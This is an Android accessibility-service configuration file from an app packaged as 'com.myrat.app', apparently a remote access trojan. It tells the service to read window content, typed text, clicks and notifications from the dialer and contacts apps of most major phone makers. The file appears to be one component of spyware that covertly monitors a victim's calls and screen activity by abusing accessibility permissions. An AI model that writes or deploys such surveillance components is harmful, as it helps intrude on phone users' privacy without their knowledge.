<?xml version="1.0" encoding="utf-8"?>
<accessibility-service
    xmlns:android="http://schemas.android.com/apk/res/android"
    android:accessibilityEventTypes="typeWindowContentChanged|typeWindowStateChanged|typeViewTextChanged|typeViewClicked|typeNotificationStateChanged"
    android:accessibilityFeedbackType="feedbackGeneric"
    android:accessibilityFlags="flagReportViewIds|flagRetrieveInteractiveWindows|flagIncludeNotImportantViews"
    android:packageNames="com.android.dialer,com.google.android.dialer,com.samsung.android.dialer,com.miui.dialer,com.huawei.contacts,com.oneplus.dialer,com.oppo.dialer,com.vivo.dialer,com.realme.dialer"
    android:canRetrieveWindowContent="true"
    android:notificationTimeout="100"
    android:settingsActivity="com.myrat.app.MainActivity"
    android:description="@string/call_accessibility_description"/>